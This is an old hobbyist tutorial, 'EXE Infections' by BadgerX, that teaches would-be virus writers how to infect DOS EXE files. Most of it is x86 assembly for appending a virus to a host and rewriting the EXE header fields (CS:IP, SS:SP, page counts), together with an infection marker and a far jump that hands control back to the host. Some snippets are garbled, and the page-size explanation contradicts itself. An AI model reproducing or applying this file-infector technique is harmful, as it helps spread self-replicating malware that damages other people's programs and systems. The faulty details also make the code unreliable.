EXE Infections
by BadgerX

[see also: COM Infections by BadgerX]

Welcome to my second tutorial: Exe Infections. This is a milestone for you to get over. If you do, and you can fully understand what's going on, you are on yer way to graduation from newbiness. Exe infections present a dive into the complex. It took my a long time to get it, and I hope that through my trials, I will be able to explain it better to you, in hopes that you will understand.

Minipulating CS:IP and SS:SP

Once we find a target, we will save these and other critical values. We will point CS to the last segment of the file by subtracting the header size from the filesize(header and the real file) so that we will get the distance from the end of the header to the end of the file. We point it to there, because that's where we append the virus. Remember, this cs value is stored in the header in page displacement. Page meaning that it's in 16 byte increments, and displacement meaning that it's a distance jump; it doesn't point to a specific locations. So, if we're putting the virus at the end of the file, the new CS formula will be:

CS=(Total Filesize - Header Size) / 16

Simple so far. The stack SEGMENT will be the same, it will reside in the last segment, where our virus is. We will set the STACK POINTER about 100 bytes past our file, so that the stack will not overwrite us. (the stack grows upwards).

      .   <--,   
     /|\     |---100 bytes for stack growth
      |      |
   STACK <--'

CS:IP MInipulation

;-]assumes buffer has read
;-]header from target and
;-]filesize in ax:dx from
;-]filepointer to end
push ax dx
;^save filesize
mov ax, word ptr [bp+offset buffer+8]
;^get headersize
mov cl, 4
shl ax, cl
xchg ax, bx
;^multiply by 16, to get
;^the header's para. size

pop ax dx
;^retrieve filesize

sub ax, bx
sbb dx, 0
;^subtact headersize from
;^file size.. in bytes

mov cx, 10h
div cx
;^to segment para displacement
;^by dividing ax by 161

mov cx, dx
add cx, 64h
;^give stack room (100d)

mov word ptr [bp+offset buffer+14h], dx
;^new IP
mov word ptr [bp+offset buffer+10h], cx
;^new SP

mov word ptr [bp+offset buffer+16h], ax
;^new CS
mov word ptr [bp+offset buffer+0Eh], ax
;^new SS

mov word ptr [bp+offset buffer+12h], AK
;^infection mark

Other Header Values

There are just a few more values in the header that need to be compensated for. Let's have a look at the entire Exe header.
   _00     MZ
   *02     # of bytes in last    512 byte page
   *04     # of 512 byte pages    in the file
   _06     Number of entries in the segment table
   _08     Size of the header in 16 byte paragraphs
   *0A     Minimum memory required    in paragraphs
   _0C     Maximum memory requested in paragraphs
   *0E     SS in 16 by paragraphs    from header
   *10     SP in offset from SS
   *12     Negative checksum
   *14     IP in offset from CS
   *16     CS in paragraphs from    header
   _18     Offset of relocation table from start of file
   _1A     Overlay number
   *denotes values which MAY have to be changed
     -offset 12 is just a good place to mark infection
     -offset 0A is just to be safe
Notice that the SS:SP is stored segment first and then offset, and that CS:IP are stored backwards, the offset (IP) coming before the segment(CS). On load, ES and DS point to the segment of psp, but if you are writing a com/exe virus, it is wise to check to make sure that ES and DS are pointing to the PSP.
   PSP     <---- DS, ES
   VIRUS   <---- CS:IP, SS
   STACK    <---- SP

Not that hard, got it so far? read over it again.. NO! SERIOUSLY! it works! read over and think carefully, it might just make it in yer understanding. Unlike com files, restoration cannot be done at the beginning of the file, and then executed later.. therefore, we must keep the values that we saved from the host, all the way until we jump to another file. Therefore, we will have two variables for each of the CS:IP and for the SS:SP. The first is to keep the originals of the host and the second is to keep the originals of the file we are targeting. Most virii perform in this fassion, and upon execution of the virus, they transfer the target variables to the original. Think of it this way.. our virus targets a file, reads it's info into the target variables and writes itself to the file. When the program is executed over again, with the new virus inside, the host's originals are in the target variables, from when we inserted the virus into there. The new virus then empties the target variables into the original so that the target variables can do the same for the next infection.

Saving Header Values

;assumes buffer had header read from target
les ax, dword ptr [bp+buffer+14h]
;^save CS:IP
mov word ptr [bp+origIPCS], ax
mov word ptr [bp+origIPCS+2], es
les ax, dword ptr [bp+buffer+0Eh]
;^save SS:SP
mov word ptr [bp+origSSSP], es
mov word ptr [bp+origSSSP+2], ax

Checking Infection

I've seen two ways to do this. One is to mark the SP spot with a large number always, just make sure that it's large enough to skip over yer virus and give it a few bytes. This is too complicated to be unnecessary. An easier way, at least in my opinion, is to mark offset 12h with an easy identifier, since the negative checksum is never used anyway. Simply move a word into the 12h offset and the compare it.

Calculating Page Values

This is an often rumored a hard routine, but it really isn't. All we have to do is get the amount of pages in the file and round them up, and then tell how many bytes are in that last page that didn't quite make it to a full page. Easily accomplished by the div command. Remember two things about this. 1) a page is simply 16 bytes and 2) div divides the values in the div routine into ax register. So if i do:

mov cx, 4
mov ax, 8
div cx

then ax should contain two, because cx was divided into ax. I like the codebreaker's routine to do this because it was similar to the one that i came up with and it is very straightforward.

Calculating Page Values

;assumes ax:dx has filesize

add ax, Vend - Vstart
adc dx, 0
;^if overflowed into
;^cf, then add that too
mov cx, 200h
div cx
;^div 512 (200 in hex)

cmp dx, 0
;^if remainder, round
je no_remainder
;^up to another page
inc ax
;^if none, then don't

mov word ptr cs:[bp+header+4],ax
;^div 16
mov word ptr cs:[bp+header+2],dx
^;mod 16

Returning control

Returning control isn't that hard at all. We use 0eah and have the two words under it for it to jump to. The two words are from the CS:IP pair.

db 0eah
origIPCS db '0000'
origSSSP db '0000'

0eah looks for offset and then segment, and that matches up fine with the header storage of the two values. Remember, this is a common yet easily avoidable mistake.. The CS:IP is stored and u will store it backwards, IP:CS. SS:SP will be stored just the same. Remember that CS is the paragraph displacement from the header of where the file used to start before we wrote the virus. Since the file is loaded in a different starting segment each time, we need to compensate for it. This is easy. We push ES and DS at start. (remember they point to beginning of PSP). We add 10h to it to skip psp. (remember, displacement offset in paragraphs, psp is 256 paragraphs which is 10h (16d) paragraphs of 16 bytes each, so we're skipping over psp). We then add this values to both the segment registers. This is done by adding it to the CS that we're going to jump to like this:

add word ptr cs:[bp+offset origIPCS+2], ax

Since SS is changeable, and is not required in the 0eah, we will minipulate it directly, by adding it to our new translated segment.

add ax, word ptr cs:[bp+offset origSSSP]

We then clear interrupts with cli so that nothing will get pushed or popped while we minipulate the stack.

mov ss, ax

Easy enough? oh, and SP? just change it to original value:

mov sp, word ptr cs:[bp+origSSSP+2]

Then we'll enable interrupts again through sti and next will come the 0eah with the variables under it. I know this might seem confusing but it's really easy. Since the virus is a dropper at first, make target IP FFF0 and CS equal 0000. This will return control to first instruction in the psp, the 20h terminate instruction, effectively closing the file.

Last Points

As in other tutorials, I have armed you with the strong, essential points. I'm not going to go over newbie stuff. It seems to me that the zines at www.codebreakers.org are devoted torwards newbies. Read other people's tutorials, anything u can. Email me at Badg3rX@hotmail.com if you must. Buena Suerte.

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